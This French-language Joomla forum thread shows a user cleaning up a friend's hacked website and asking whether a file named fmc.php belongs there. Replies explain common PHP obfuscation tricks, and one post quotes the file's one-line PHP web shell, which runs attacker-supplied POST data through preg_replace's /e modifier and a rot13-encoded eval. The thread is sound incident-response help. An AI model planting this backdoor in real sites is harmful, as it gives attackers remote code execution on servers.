Question Question suite à piratage

  • jeanclaude57
  • Portrait de jeanclaude57 Auteur du sujet
  • Hors Ligne
  • Nouveau membre
  • Nouveau membre
Plus d'informations
26 Mar 2016 10:29 - 26 Mar 2016 11:12 #1 par jeanclaude57
Question suite à piratage a été créé par jeanclaude57
Bonjour
dernièrement le site d'un ami c'est fait piraté.
Je suis entrain de m'en occuper mais je ne suis pas spécialiste Joomla
Il avait à la racine des fichiers php qui redirigeaient vers des sites frauduleux.
Il me reste à la racine un fichier au quel j'ai un doute.
Ma question est donc est ce qu'il y a un fichier fmc.php à la racine de Joomla ?
Jean Claude
Dernière édition: 26 Mar 2016 11:12 par serge.

Connectez-vous ou Créer un compte pour participer à la conversation.

Plus d'informations
26 Mar 2016 11:11 #2 par serge
Réponse de serge sur le sujet Question suite à pirtage
normalement, non
Les utilisateur(s) suivant ont remercié: Eclipse

Connectez-vous ou Créer un compte pour participer à la conversation.

Plus d'informations
26 Mar 2016 12:48 #3 par o2_alexis
Réponse de o2_alexis sur le sujet Question suite à piratage
Bonjour,

Je confirme. Pour savoir si c'est un fichier pirate, vous pouvez le télécharger sur votre ordinateur et l'ouvrir avec un éditeur de texte comme notepad par exemple.
Les fichiers pirates PHP sont normalement inoffensif pour un ordinateur (il n'y a pas PHP ou de serveur web d'installé).

Habituellement les fichiers pirates "saute aux yeux" visuellement, c'est des "gros bloc" de code. Ce sont très souvent les mêmes fonctions PHP qui sont utilisés : eval, base64_decode, gzdecode etc...

L'idée est de maquer le code en quelque sorte. Les pirates utilisent souvent une ou plusieurs de ces fonctions en chaines. Visuellement le code peut ressembler à ça eval(base64_decode(#grosseChaineDeCarractère)).
Les utilisateur(s) suivant ont remercié: Eclipse

Connectez-vous ou Créer un compte pour participer à la conversation.

  • jeanclaude57
  • Portrait de jeanclaude57 Auteur du sujet
  • Hors Ligne
  • Nouveau membre
  • Nouveau membre
Plus d'informations
26 Mar 2016 12:56 #4 par jeanclaude57
Réponse de jeanclaude57 sur le sujet Question suite à piratage
Il y a juste ceci dans ce fichier
<?php ($www= $_POST['zve3wni']) && @preg_replace('/ad/e','@'.str_rot13('riny').'($www)', 'add');?>

Connectez-vous ou Créer un compte pour participer à la conversation.

Plus d'informations
26 Mar 2016 13:38 #5 par o2_alexis
Réponse de o2_alexis sur le sujet Question suite à piratage
Effectivement c'est pirate, ça utilise une technique du "preg_replace", le "e modifer" qui permet d'exécuter du code sans forcément faire appel à une fonction comme eval() souvent bloqué par sécurité par les hébergeurs. D'ailleurs, "str_rot13('riny')" = eval.

Ce petit bout de code permet au pirate d'exécuter plus ou moins ce qu'il veut, via une requête POST qu'il fait sur le fichier.

Un article explique cela assez bien ici : www.madirish.net/402
Cf. celui-ci également : ejth.dk/2011/eval-is-evil-hiding-it-is-even-more-evil/98
Les utilisateur(s) suivant ont remercié: tramber91, Eclipse, jeanclaude57

Connectez-vous ou Créer un compte pour participer à la conversation.

  • jeanclaude57
  • Portrait de jeanclaude57 Auteur du sujet
  • Hors Ligne
  • Nouveau membre
  • Nouveau membre
Plus d'informations
26 Mar 2016 18:31 #6 par jeanclaude57
Réponse de jeanclaude57 sur le sujet Question suite à piratage
Super merci à vous

Jean Claude
Les utilisateur(s) suivant ont remercié: Eclipse

Connectez-vous ou Créer un compte pour participer à la conversation.

  • Vous ne pouvez pas: Créer un nouveau sujet.
  • Vous ne pouvez pas: Répondre au sujet.
  • Vous ne pouvez pas: Éditer votre message.
Modérateurs: lavstephxillibittramber91Scottuxsergestarter
Temps de génération de la page : 0.271 secondes